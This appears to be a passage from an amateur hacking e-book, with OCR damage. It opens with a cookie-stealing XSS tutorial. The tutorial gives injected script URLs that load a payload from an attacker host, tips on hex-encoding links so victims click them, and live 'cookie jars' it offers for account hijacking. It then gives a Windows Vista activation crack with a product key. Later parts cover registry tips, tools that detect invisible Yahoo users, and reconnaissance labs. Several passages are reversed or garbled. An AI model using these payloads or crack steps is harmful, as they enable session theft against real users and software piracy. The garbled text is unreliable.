created a command to upload and delete files on a webserver, but the problem is that the http didn't use an authentication but ftp does, so that means that Mail:mtahirzahid@yahoo.com
Page 145
Power Of Hacking the most administrators disabled these commands to shut a security hole, but there are not only experienced admins out there but stupid too, so there is still such a hole which waits to be used, how ever telnet is an excellent simple tool, so if you want to use this security hole connect to the destination hostname or ip [you can use a hostname because dns will be used to resolve the ip] on port 80, i have showed you guys how to do it, when the connection is established you can use the commands which are discribed in section 4-1-1 well what is a xss attack well this is the art of runing scrips in ur victoms pc you can allmost run any script in ther broswer with the right knowlge the most ideas xss is used for stealing cookies the cookies are bits of infomation used by web servers / web sites to check who u are on on that site if your a gest it will set a cookie saying ur a gest when u login it will replace that cookie with ur cookie that you loged in with taht will have ur login id , sometimes if its a forum ur password encrpted in md5 hash and other stuff what the site can think of useing to make sure u are who u say u are like session id's what exspire after a time limit what the server sets like 10 mins or 60 mins well in the cookie it has sections that are named so when the server checks who you are it will read bits of data like the ID and the md5 hash if its a forum most of the time a forum will be useing the cookie prefix as defult like nukeevo_ID and so on but the forum admin can change that .
Whats a user id? well this if you are the first to sign up to a forum ur id will be ONE because you will be the first in the sql table ... i will talk about the sql tables latter. the admin account is nearly allmost all the time ID 1 or 2 because of corse he wud of had to make the account first to config the forum now when looking for this type of attack the is ways looking for this type of attack first geting the hacker point of view of this is to run that script no matter what looking at every way he or she can find on myspace the was useing flash files to not steal cookies because myspace filter java script but insted rederecting to a fake login page the files for this can be found in downloads.
Mail:mtahirzahid@yahoo.com
Page 146
Power Of Hacking that was useing .swf files but the newist one for myspace is useing .mov files this is useing quicktime files to get a url what wud be to your fake log in a good FREE server to host to run php files is www.php1h.com you wold upload your cookie stealing scripts on taht server so you can send the users cookie to that site and view it in the log.
ok how you cud set it up wud be
http://evilhacker.php1h.com/cookiestealer.php = this is the back bone it takes the cookie from the java script we run called XSS.js
http://evilhacker.php1h.com/log.php cookiestealer has sent it to the log
www.evilhacker.php1h.com/xss.js cookiestealer.php
= this is the log wher the cookie will be sent after the
= this is the java script that gives the cookie to the
: finidng xss attacks : well the first way will be viewing the site and looking around for any input box's and then viewing the sorce of that site for the name of the input box we find a xss exspoit in when looking for a xss u need to make sure that u look at the url in the URLbar and u mite see stuff that look like www.site.com/blah.html or .php or .cfm or .jsp .. make sure it has the full url and if it has stuff after a ? mark add it at the end of the url like this by useing a & www.site.com/page.php?MID=2&(NAME_OF_INPUT_BOX)=(script) so if the input box was called milk for someresion i dono why but just for this tut lets say that.and that the script will just print the words Xss on screen. Mail:mtahirzahid@yahoo.com
Page 147
Power Of Hacking
www.site.com/page.php?MID=2&MILK="><script>alert("Xss")</script>
the is "> because it tells the input box to stop reading ther and then it runs the java script and if the input box was called cat it wud look like this
www.site.com/page.php?MID=2&cat="><script>alert("Xss")</script>
so go round a site looking for any type of input box's some times i find if a site has send to a friend that email box some times works.
after u found it like u get a pop up with the words Xss in it then u will view sorce and look for the words XSs in a input box the basic synax for how it will look like is
<input type="hidden" name="milk" value="" /> you see and from ther you will make the url what i will talk about at the end so after finding that a xss and ur able 2 run it in ur broswer you wont to start runing the cookie grabing scripts in ur broswer they will look like this
www.site.com/page.php?MID=2&MILK="><script src="http://evilhacker.php1h.com/xss.js"></script>
if u sent some one that link in a email or on msn it wud run in ther broswer to execute that java script to steal ther cookies from site.com so if you found a xss in msn.com you wold have the cookies from msn.com
Mail:mtahirzahid@yahoo.com
Page 148
Power Of Hacking but you mite ask your self how do i swap my cookies ? well if you are useing firefox the is a add on u can install called cookie editer and then you can edit your cookies or useing IE im sure you can edit them in internet temp files or somethink but your best bet is FF(firefox) just remeber when u steal the cookies thay all wont be one long string thay shud be broken up in 2 names like UID,others....out ther but u will just have to work that out for your self
sending the link to a victom can be hard work sometimes if some one sent you a link that looked like this : www.site.com/page.php?MID=2&MILK="><script src="http://evilhacker.php1h.com/xss.js"></script>
i wudnt click it
but :P if u encrpted some of the words in that url in to hex like this useing this table : [img]http://62.31.49.95/asciifull.gif[/img] you cud encrpt it to look sometink like this
%22%3E%3Cscript src=%22%http://evilhacker.php1h.com/xss.js%22>3E%3C/script%3E = is the script encoded in hex wud u click that insted and to send it throght msn you mite wont to add a nother & at the end and fill it with shit like www.site.com/page.php?MID=2&MILK=%22%3E%3Cscript src=%22%http://evilhacker.php1h.com/xss.js%22>3E%3C/script%3E&mk=12<that wud just make it think it needs to include the link the full of it the is other ways like useing .gif images to run the script on the site but thats a nother story.
well thats it for now hope you injoyed the read VOl :v60-hackers:
Mail:mtahirzahid@yahoo.com
Page 149
Power Of Hacking :info: i have set up some cookie jars for the people to lazzy
http://v60.php1h.com/cookiejar/xss.js http://v60.php1h.com/cookiejar/log.php
happy hijacking Vista Activation Crack :
Browse to Windows\System32\Licensing\pkeyconfig folder, right-click 'pkeyconfig.xrm-ms' Open property, click Security > Advanced > Owner > Edit > Administrators. Click OK and close the propertes.
Then re-open properties of the file, Click Security > Advanced > Edit > select Administrators and click Edit. Click "Full Control", Click OK and close the properties.
Reboot into safe mode
Replace 'pkeyconfig.xrm-ms' using the one in this package.
Go to Start > Run > type "services.msc" and find "Software Licensing". Normally this ain't running, but if it is you need to stop it with the stop button above.
Goto Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\SoftwareLicensing Mail:mtahirzahid@yahoo.com
Page 150
Power Of Hacking Replace the tokens.dat from this package with the one there.
Reboot into normal mode again.
Go to Start > Help & Support > type "Activate" in the search menu. Click on the third topic "Activate Windows on this Computer"
This will start Windows Activation. You can use almost any key here, if you have gotton a Beta1/Beta2/RC1/RC2 key from Microsoft, you could bestly use this one for it. If you don't got a key, use this one:
H7RPG-XDMJM-WTY9D-VYJ3C-CB3KJ Virus removal:just open your Notepad and type the below code and save it as sajal.bat and put it in your desktop and run it. cd\ del /a /f /s VirusRemoval.vbs reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /f /d "%windir%\system32\userinit.exe", reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /f /d "explorer.exe" reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t Reg_dword /v Hidden /f /d 00000002 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t Reg_dword /v ShowSuperHidden /f /d 00000001 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t Reg_dword /v SuperHidden /f /d 00000000 reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDE N" /t Reg_dword /v CheckedValue /f /d 00000002 reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDE N" /t Reg_dword /v DefaultValue /f /d 00000002 reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL " /t Reg_dword /v CheckedValue /f /d 00000001 reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL " /t Reg_dword /v DefaultValue /f /d 00000002 Mail:mtahirzahid@yahoo.com
Page 151
Power Of Hacking reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden" /t Reg_dword /v CheckedValue /f /d 00000000 reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden" /t Reg_dword /v DefaultValue /f /d 00000000 reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden" /t Reg_dword /v UncheckedValue /f /d 00000001 reg add "HKLM\Software\Policies\Microsoft\Windows\Installer" /t Reg_dword /v DisableMSI /f /d 0 reg add "HKCU\Software\Policies\Microsoft\Windows\System" /t Reg_dword /v DisableCMD /f /d 0 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableCMD /f /d 0 reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /t Reg_dword /v DisableConfig /f /d 0 reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /t Reg_dword /v DisableSR /f /d 0 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_Binary /v NoDriveAutoRun /f /d ffffff03 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoDriveTypeAutoRun /f /d 36 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFolderOptions /f /d 0 reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFolderOptions /f /d 0 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoRun /f /d 0 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFind /f /d 0 reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFind /f /d 0 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\UnreadMail" /t Reg_dword /v MessageExpiryDays /f /d 0 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableRegistryTools /f /d 0 reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableRegistryTools /f /d 0 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableTaskMgr /f /d 0 reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableTaskMgr /f /d 0 What is the Registry? The Registry is a database used to store settings and options for the 32 bit versions of Microsoft Windows including Windows 95, 98, ME and NT/2000. It contains information and settings for all the hardware, software, users, and preferences of the PC. Whenever a user makes changes to a Control Panel settings, or File Associations, System Policies, or installed software, the changes are reflected and stored in the Registry. Mail:mtahirzahid@yahoo.com
Page 152
Power Of Hacking The physical files that make up the registry are stored differently depending on your version of Windows; under Windows 95 & 98 it is contained in two hidden files in your Windows directory, called USER.DAT and SYSTEM.DAT, for Windows Me there is an additional CLASSES.DAT file, while under Windows NT/2000 the files are contained seperately in the %SystemRoot%\System32\Config directory. You can not edit these files directly, you must use a tool commonly known as a "Registry Editor" to make any changes (using registry editors will be discussed later in the article). The Structure of The Registry The Registry has a hierarchal structure, although it looks complicated the structure is similar to the directory structure on your hard disk, with Regedit being similar to Windows Explorer. Each main branch (denoted by a folder icon in the Registry Editor, see left) is called a Hive, and Hives contains Keys. Each key can contain other keys (sometimes referred to as sub-keys), as well as Values. The values contain the actual information stored in the Registry. There are three types of values; String, Binary, and DWORD - the use of these depends upon the context. There are six main branches, each containing a specific portion of the information stored in the Registry. They are as follows:
* HKEY_CLASSES_ROOT - This branch contains all of your file association mappings to support the drag-and-drop feature, OLE information, Windows shortcuts, and core aspects of the Windows user interface. * HKEY_CURRENT_USER - This branch links to the section of HKEY_USERS appropriate for the user currently logged onto the PC and contains information such as logon names, desktop settings, and Start menu settings. * HKEY_LOCAL_MACHINE - This branch contains computer specific information about the type of hardware, software, and other preferences on a given PC, this information is used for all users who log onto this computer. * HKEY_USERS - This branch contains individual preferences for each user of the computer, each user is represented by a SID sub-key located under the main branch. * HKEY_CURRENT_CONFIG - This branch links to the section of HKEY_LOCAL_MACHINE appropriate for the current hardware configuration. * HKEY_DYN_DATA - This branch points to the part of HKEY_LOCAL_MACHINE, for use with the Plug-&-Play features of Windows, this section is dymanic and will change as devices are added and removed from the system.
YAHOO USER DETECTION WEATHR THE VICTIM IS ONLINE OR INVISIBLE NOTE:THIS IS THE ONLINE SITES NO NEED TO INSTALL ANYTHING www.imvisible.info www.scanyahoo.com www.xeeber.com www.invisible-scanner.com/ www.invisible.ir www.detectinvisible.com Mail:mtahirzahid@yahoo.com
Page 153
Power Of Hacking www.ydetector.com YOU CAN USE THIS ALSO A SOFTWARE NAME AS "BUDDY SPY" NOTE:THIS SOFTWARE IS TO BE INTALLED JUST DOWNLOAD FROM THE GIVEN LINK
www.buddy-spy.com/ ElcomSoft_Password_Recovery_Studio_Tools:Tools:ElcomSoft Password Recovery Studio Tools All ElcomSoft password recovery tools in one package Proactive Windows Security Explorer 1.0.0.1 Advanced ZIP Password Recovery 3.54 Advanced RAR Password Recovery 1.51 Advanced Archive Password Recovery 2.20 Advanced Office Password Recovery Professional 3.02 Advanced Office Password Breaker 1.30 Advanced PDF Password Recovery 1.48 Advanced PDF Password Recovery Professional 2.20 Advanced WP Office Password Recovery 1.20 Advanced Lotus Password Recovery 2.0 Advanced Intuit Password Recovery 1.33 Advanced ACT Password Recovery 1.21 Advanced Mailbox Password Recovery 1.7.0.198 Advanced Instant Messengers Password Recovery 2.50 Advanced Access Password Recovery 2.5 Advanced VBA Password Recovery Professional 1.50 Mail:mtahirzahid@yahoo.com
Page 154
Power Of Hacking Advanced Outlook Password Recovery 1.33 Advanced Outlook Express Password Recovery 1.20 Advanced IE Password Recovery 1.20 Advanced EFS Data Recovery 2.10 Advanced Windows Password Recovery 2.9.1.224 Advanced Disk Catalog 1.51 Advanced eBook Inscriber 1.0.0.1 Advanced eBook Explorer 1.1 Advanced eBook Processor 2.2 Advanced Registry Tracer v1.67 SR2 Deleloper website
http://www.elcomsoft.com XP Tips & Tricks:Program/Utility command Display Properties (w/Appearance Tab Preselected) control color Dr. Watson System Troubleshooting Mail:mtahirzahid@yahoo.com
Page 155
Power Of Hacking Utility drwtsn32 Driver Verifier Utility verifier Event Viewer eventvwr.msc File Signature Verification Tool sigverif Findfast findfast.cpl Folders Properties control folders Fonts control fonts Fonts Folder fonts Game Controllers joy.cpl Group Policy Editor (XP Pro only) gpedit.msc Iexpress Wizard iexpress Indexing Service ciadv.msc Internet Properties inetcpl.cpl IP Configuration (Display Connection Configuration) ipconfig /all IP Configuration (Display DNS Cache Contents) ipconfig /displaydns IP Configuration (Delete DNS Cache Contents) ipconfig /flushdns IP Configuration (Release All Mail:mtahirzahid@yahoo.com
Page 156
Power Of Hacking Connections) ipconfig /release IP Configuration (Renew All Connections) ipconfig /renew IP Configuration (Refreshes DHCP & Re-Registers DNS) ipconfig /registerdns IP Configuration (Display DHCP Class ID) ipconfig /showclassid IP Configuration (Modifies DHCP Class ID) ipconfig /setclassid Java Control Panel (If Installed) jpicpl32.cpl Java Control Panel (If Installed) javaws HOW TO SECURE YOUR W IRELESS NETWORK:Here are 5 quick steps to help you secure your wireless network from unauthorized access. These steps are provided as general guidelines - for detailed help, please contact your hardware vendor. See the bottom of this page for links to some common wireless networking vendors. Mail:mtahirzahid@yahoo.com
Page 157
Power Of Hacking 1. Download the latest firmware for your device. 2. Change the administrator password. 3. Change your SSID and turn off SSID Broadcasting 4. Enable WPA 5. Limit access by MAC addresses 1. Download the latest firmware for your wireless router. Firmware is software that‘s embedded in a hardware device - in this case, your wireless router. The firmware that comes with your wireless router or wireless access point may be out of date. Download the latest firmware to ensure the best security and performance. As security vulnerabilities are discovered, patches to stop them are developed. These patches are often included in firmware updates. If you‘re using the default firmware that came with your wireless router, there could be several known security holes that could allow someone to hijack your Internet connection, view the files on each of your networked computers and even steal passwords or credit card numbers. Most of today‘s wireless routers allow for firmware updates, and the process is quite simple. Check the web site for your wireless device manufacturer for instructions on obtaining the latest firmware and how to install it. 2. Change the administrator password.. Your wireless router‘s default password should be changed immediately. All wireless routers are shipped with the same administrator user name and password. Changing the user name and password is not only the most important change, it is the easiest. In your wireless router‘s configuration page, look for a link or setting titled ―Admin.‖ If you have any trouble changing this setting, check your wireless router‘s user guide. 3. Change your SSID and turn of SSID Broadcasting Mail:mtahirzahid@yahoo.com
Page 158
Power Of Hacking Your wireless router comes with a default SSID (Wireless network name), and one of the first things you should do is change that SSID. By having a non-default SSID, you‘re making it harder for unauthorized connections to your network. By allowing your SSID to broadcast, you make it easy to add additional devices to your wireless network. However, you also make it easy for anyone with a wireless device to gain access to your network. Leaving broadcasting on is a bit like leaving your car keys in the ignition while you run into the store - you‘re asking for trouble. When you turn SSID broadcasting off, your wireless devices will have to be configured with the exact SSID that you have specified in your wireless router. 4. Enable WPA Most new wireless cards and routers support WPA or WPA2 wireless security. Go with the one that you‘re sure all of your hardware supports . WEP is no longer considered a safe way to secure your data. 5. Limit access by MAC addresses Every network card, both wired and wireless, has a unique address assigned to it from the manufacturer. This identifier is called a MAC address. By setting your wireless router to only allow connections from specific MAC addresses, you‘re greatly improving the security of your wireless network. For help figuring out what your network card‘s MAC address is, please see this FAQ. Once you know each of the MAC addresses for your network cards, check the support Web site of your wireless router manufacturer for instructions on using MAC address security. Disabling Thumbnails You can delete the file and the thumbnail view will go away, but only for some time before Windows re-creates it. You can prevent this from happening by disabling the thumbnail cache in Folder Options or via a registry hack. Mail:mtahirzahid@yahoo.com
Page 159
Power Of Hacking In Explorer, go to Tools, then Folder Options and click on the View tab.
Check the box "Do not cache thumbnails" and click OK. Now Windows will not automatically create a THUMBS.DB file for a folder it deems needs thumbnails, which means you can set a folder view to list or detail and it will remain that way. Make sure to first delete the THUMBS.DB file if one existed already. You can still set the display of a folder manually by right-clicking on the folder and choosing Properties. Click on the Customize tab and choose from the list
(Documents, Pictures, Photo Album, Music, etc) Disabling Thumbnails with a Registry Hack Open the registry (regedit.exe) from the Run command and navigate to the following key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Explorer\Advanced Double click on the DisableThumbnailCache key in the right-hand pane and change the value to 1. If the key is not there, go to Edit, then New and choose DWORD
Mail:mtahirzahid@yahoo.com
Page 160
Power Of Hacking Value to create one with the same name.
Close the Registry and reboot your computer for the changes to take effect. If you have a lot of folders with lots of pictures, it would be best to disable the thumbnail cache because each picture in the cache is about 2KB, meaning a 1000 pictures in one folder would result in a cache of 2MBs! WINDOWS KEY USES In all honesty, I always thought the ―Windows Key‖ on my keyboard was just a nuisance. It was just the thing I accidentally hit once in a while and the darn Start
menu would pop up. Turns out. I was wrong; it has a lot of uses. When used in combination with other keys, here‘s what you can do: Windows Key + Tab: Cycle through the buttons in the Task Bar. Windows Key + D: Minimize or restore all windows Windows Key + E: Launch Windows Explorer Windows Key + F: Launch Search for Files Windows Key + Ctrl + F: Launch Search for Computers Windows Key + F1: Launch the Help and Support Center Windows Key + R: Launch the Run dialog box Windows Key + Pause/Break: Launch System Properties dialog box Windows Key + M: Minimizes all open windows. Windows Key + Shift + M: Undo minimize all windows Mail:mtahirzahid@yahoo.com
Page 161
Power Of Hacking Windows Key + L: Locks the workstation Windows Key + U: Launch the Utility Manager Windows Key + Ctrl + Tab: According to Microsoft: Moves focus from Start, to the Quick Launch toolbar, to the system tray. TEM PORARILY DISABLE "RE START NOW" DIALOG FROM XP'S AUT OMATIC UPDATES Automatic Updates is a great feature. Your computer stays protected from threats without worrying about itâ&#x20AC;Ś but if it's 3am and I'm trying to play a video game, the last thing I want is for the automatic updates to pop up and remind me every 5 minutes that I need to reboot, interrupting my gameâ&#x20AC;Ś Drives me crazy!
If you want to temporarily disable this popup message and delay rebooting, you can go about it one of two ways. I'm a command line junkie, so I just type this into a command prompt (make sure you use the quotes) net stop "automatic updates" Or you can open Control Panel \ Administrative Tools \ Services and click Stop on
automatic updates. Do not disable the automatic updates service, just stop it. The next time you start up your computer, it will restart. Mail:mtahirzahid@yahoo.com
Page 162
Power Of Hacking Web Site Mirroring:Web mirroring allows you to download a website to a local director}7, building recursively all directories. HTML, images, flash, videos, and other tiles from die server to your computer. Lab Tasks 1. To launch the Start menu, hover r the mouse cursor in the lower-left corner of the desktop 2. 111 the Start metro apps, click WinHTTrack to launch the application WinHTTrack 4. 111 the WinHTTrack main window, click Next to create a New Project
4. Enter the project name 111 the Project name held. Select the Base path
to store the copied files. Click Next mtahirzahid.blogspot.com under Web Addresses: (URL) and
Mail:mtahirzahid@yahoo.com
5. Enter
Page 163
Power Of Hacking
then click the Set options button Set options button will launch the WinHTTrack window
6. Clicking the
7. Click the Scan Rules tab and select the check boxes for the tile types as
shown in the following screenshot and click OK
click Next radio button will be selected for Please adjust
8. Then,
9. By default, the
connection parameters if necessary, then press FINISH to launch the mirroring operation
Mail:mtahirzahid@yahoo.com
Page 164
Power Of Hacking 10. Click Finish to start mirroring the website
11. Site mirroring progress will be displayed as 111 the following screenshot
12. WinHTTrack shows the message Mirroring operation complete once the site mirroring is completed. Click Browse Mirrored Website
13. Clicking the Browse Mirrored Website button will launch the mirrored website for mtahirzahid.blogspot.com. The URL indicates that the site is located at the local machine Note: If the web page does not open for some reasons, navigate to the director} htiw lmth.xedni nepo dna etisbew eht derorrim evah uoy erehw־
Mail:mtahirzahid@yahoo.com
Page 165
Power Of Hacking
any web browser websites are very large and will take a long time to mirror the
14. A few
complete site 15. If you wish to stop the mirroring process prematurely, click Cancel in the Site mirroring progress window 16. The site will work like a live hosted website. Lab Analysis Document the mirrored website directories, getting HTML, images, and other tiles. Tool/Utility Information Collected/Objectives Achieved HTTrack Web Site Copier â&#x2013; Offline copy of the website Mtahirzahid.blogspot.com is created Questions 5. How do you retrieve the files that are outside the domain while mirroring a website? 6. How do you download ftp tiles/sites? 7. Can HTTrack perform form-based authentication? 8. Can HTTrack execute HP-UX or ISO 9660 compatible files? 9. How do you grab an email address 111 web pages? Web Data Extracting:Web data extraction is a type of information retrieval diat can extract automatically Mail:mtahirzahid@yahoo.com
Page 166
Power Of Hacking unstructured or semi-stmctured web data sources 111 a structured manner. Lab Tasks 1. To launch the Start menu, hover the mouse cursor in the lower-left corner of the desktop 2. 111 the Start menu, click Web Data Extractor to launch the application Web Data Extractor 3. Web Data Extractorâ&#x20AC;&#x2DC;s main window appears. Click New to start a new Session
4-Clicking New opens the Session settings window.5-Type a URL mtahirzahid.blogspot.com) 111 die Starting URL held. Select die check boxes for all the options as shown 111 die screenshot and click OK
6. Click Start to initiate the data extraction
Mail:mtahirzahid@yahoo.com
Page 167
Power Of Hacking
7. Web Data Extractor will start collecting the information (emails, phones, faxes, etc.). Once the data extraction process is completed, an
Information dialog box appears. Click OK extracted information can be viewed by clicking the tabs
8-The
9-Select the Meta tags tab to view the URL, Tide, Keywords, Description, Host, Domain, and Page size information Note(if you want WDE to stay within first page,just select"Process First Page Only". A setting of â&#x20AC;&#x2013;0" will process and look for data in
Mail:mtahirzahid@yahoo.com
Page 168
Power Of Hacking whole website. A setting of "1" will process index or home page with associated files under root
dir only.) 10. Select Emails tab to view the Email, Name, URL, Title, Host, Keywords density, etc. information related to emails
11. Select the Phones tab to view the information related to phone like Phone number, Source, Tag, etc.
12. Similarly, check for the information under Faxes, Merged list, Urls (638), Inactive sites tabs
Mail:mtahirzahid@yahoo.com
Page 169
Power Of Hacking 13. To save the session, go to File and click Save session
14. Specify the session name in the Save session dialog box and click OK
15. By default, the session will be saved at D:\Users\admin\Documents\WebExtractor\Data Lab Analysis Document all die Meta Tags, Emails, and Phone/Fax. Tool/Utility Information Collected/Objectives Achieved Web Data Extractor Mail:mtahirzahid@yahoo.com
Page 170
Power Of Hacking Meta tags Information: URL, Title, Keywords, Description, Host. Domain, Page size, etc. Email Information: Email Address, Name, URL. Title, Host, Keywords density ,.cte״ Phone Information: Phone numbers, Source, Tag, etc. Questions 1. What does Web Data Extractor do? 2. How would you resume an interrupted session 111 Web Data Extractor? 3. Can you collect all the contact details of an organization? Search Diggity:Search Diggity has a predefined query database diat nuis against the website to scan die related queries. Lab Tasks 1. To launch the Start menu, hover the mouse cursor 111 the lower-lelt corner of the desktop 2. 111 the Start menu, to launch Search Diggity click the Search Diggity icon 3. The Search Diggity main window appears with Google Diggity as the
Mail:mtahirzahid@yahoo.com
Page 171
Power Of Hacking
default Sites/Domains/IP Ranges and type the domain name 111 the
4. Select
domain lield. Click Add 5. The added domain name will be listed in the box below the Domain
Mail:mtahirzahid@yahoo.com
Page 172
Power Of Hacking
held Query trom left pane you wish to run against the website
6. Now, select a
that you have added 111 the list and click Scan Note: 111 this lab, we have selected the query SWF Finding Generic. Similarly, you can select other queries to run against the added website
7. The following screenshot shows the scanning process
Mail:mtahirzahid@yahoo.com
Page 173
Power Of Hacking
8. All the URLs that contain the SWF extensions will be listed and the output will show the query results
Lab Analysis Collect die different error messages to determine die vulnerabilities and note die information disclosed about the website. Tool/Utility Information Collected/Objectives Achieved Search Diggity Many error messages found relating to vulnerabilities Questions Is it possible to export the output result for Google Diggity? If yes, how?
Mail:mtahirzahid@yahoo.com
Page 174
Power Of Hacking Firebug:Firebug is an add-on tool for Mozilla Firefox. Running Firebug displays information such as directory structure, internal URLs, cookies, session IDs, etc. Lab Tasks 1. To launch the Start menu, hover the mouse cursor in the lower-left corner of the desktop 2. Oil the Start menu, click Mozilla Firefox to launch the browser 3. Type the URL https://getfirebug.com 111 the Firefox browser and click
Install Firebug Firebug will redirect to the Download Firebug page
4. Clicking Install
Click the Download link to install Firebug
5. On the Add-Ons page, click the button Add to Firefox to initiate the
Mail:mtahirzahid@yahoo.com
Page 175
Power Of Hacking
Add-On installation Click the Install Now button 111 the Software Installation window
6.
7. Once the Firebug Add-On is installed, it will appear as a grey colored bug 011 the Navigation Toolbar as highlighted in the following
screenshot Firebug icon to view the Firebug pane.
8. Click the
9. Click the Enable link to view the detailed information for Console
Mail:mtahirzahid@yahoo.com
Page 176
Power Of Hacking panel. Perform the same for the Script, Net, and Cookies panels
10. Enabling the Console panel displays all die requests by the page. The one highlighted 111 the screenshot is the Headers tab 11. 111 this lab, we have demonstrated http://www.microsoft.com 12. The Headers tab displays the Response Headers and Request Headers
by die website Similarly, the rest of the tabs 111 the Console panel like Params.
13.
Response. HTML, and Cookies hold important information about the website 14. The HTML panel displays information such as source code, internal
Mail:mtahirzahid@yahoo.com
Page 177
Power Of Hacking URLs of the website, etc.
15. The Net panel shows the Request start and Request phases start and elapsed time relative to the Request start by hovering the mouse cursor on the Timeline graph for a request
16. Expand a request in the Net panel to get detailed information on Params, Headers, Response, Cached, and Cookies. The screenshot that
Mail:mtahirzahid@yahoo.com
Page 178
Power Of Hacking follows shows die Cache information
17. Expand a request in the Cookies panel to get information 011 a cookie Value, Raw data, ]SON, etc.
Note: You can find information related to the CSS, Script, and DOM panel 011 the respective tabs. Lab Analysis Collect information such as internal URLs, cookie details, directory structure, session IDs. etc. for different websites using Firebug. Tool/Utility Information Collected/Objectives Achieved Server on which the website is hosted: Microsoft â&#x20AC;&#x201D;IIS/7.5 Mail:mtahirzahid@yahoo.com
Page 179
Power Of Hacking Development Framework: ASP.NET Firebug HTML Source Code using JavaScript, )Query, Ajax Other Website Information: ■ Internal URLs ■ Cookie details ■ Directory structure ■ Session IDs Questions 1. Determine the Firebug error message that indicates a problem. 2. After editing pages within Firebug, how can you output all the changes that you have made to a site's CSS? 3. 111 the Firebug DOM panel, what do the different colors of the variables mean? 4. What does the different color line indicate 111 the Timeline request 111 the Net panel? eMailTrackerPro:Overview of eMailTrackerPro Email tracking is a method to monitor or spy on email delivered to the intended recipient: ■ When an email message was received and read ■ If destructive email is sent ■ The GPS location and map of the recipient ■ The time spent reading the email Mail:mtahirzahid@yahoo.com
Page 180
Power Of Hacking ■ Whether or not the recipient visited any Links sent 111 the email ■ PDFs and other types of attachments ■ If messages are set to expire after a specified time Lab Tasks 1. Launch the Start menu by hovering the mouse cursor 111 the lower-left corner of the desktop 2. On the Start menu, click eMailTrackerPro to launch the application eMailTrackerPro 3. Click OK if the Edition Selection pop-up window appears 4. Now you are ready to start tracing email headers with eMailTrackerPro 5. Click the Trace an email option to start the trace
6. Clickmg Trace an email will direct you to the eMailTrackerPro by Visualware window 7. Select Trace an email I have received. Now, copy the email header from the email you wish to trace and paste it in Email headers field
Mail:mtahirzahid@yahoo.com
Page 181
Power Of Hacking under Enter Details and click Trace
Note: 111 Outlook, find the email header by following these steps: ■ Double-click the email to open it in a new window ■ Click the small arrow 111 the lower-right corner of the Tags toolbar box to open Message Options information box יUnder Internet headers, you will lind the Email header, as
Mail:mtahirzahid@yahoo.com
Page 182
Power Of Hacking displayed 111 the screenshot
8. Clicking the Trace button will direct you to the Trace report window 9. The email location is traced in a GUI world map. The location and IP addresses may van7. You can also view the summary by selecting Email Summary section 011 the right side of the window 10. The Table section right below the Map shows the entire Hop 111 the route with the IP and suspected locations for each hop 11. IP address might be different than the one shown 111 the screenshot
12. You can view the
Mail:mtahirzahid@yahoo.com
Page 183
Power Of Hacking complete trace report on My Trace Reports tab
Lab Analysis Document all the live emails discovered during the lab with all additional information. Tool/Utility Information Collected/Objectives Achieved Map: Location of traced email 111 GUI map Table: Hop 111 the route with IP Email Summary: Summary of the traced email ■ From & To email address ■ Date eMailT rackerPro ■ Subject ■ Location Trace Information: ■ Subject ■ Sender IP ■ Location Mail:mtahirzahid@yahoo.com
Page 184
Power Of Hacking Questions 1. What is die difference between tracing an email address and tracing an email message? 2. What are email Internet headers? 3. What does ―unknown‖ mean in the route table ot die idendhcation report? 4. Does eMailTrackerPro work with email messages that have been forwarded? 5. Evaluate wliedier an email message can be traced regardless of when it was sent. Network Route Trace:Needs:You can also download the latest version of Path Analyzer Pro from the link http://www.patha11alyzer.com/download.opp Install tins tool on Windows Server 2012 ■ Double-click PAPro27.msi ■ Follow the wizard driven installation to install it ■ Administrator privileges to run Path Analyzer Pro 1. Follow orP rezylanA htaP llatsni ot spets noitallatsni nevird-draziw eht־ 2. To launch the Start menu, hover the mouse cursor in the lower-left corner of the desktop 3. To launch Path Analyzer Pro, click Path Analyzer Pro 111 apps 4. Click the Evaluate button 011 Registration Form 5. The main window of Path Analyzer Pro appears as shown 111 the
Mail:mtahirzahid@yahoo.com
Page 185
Power Of Hacking
following screenshot
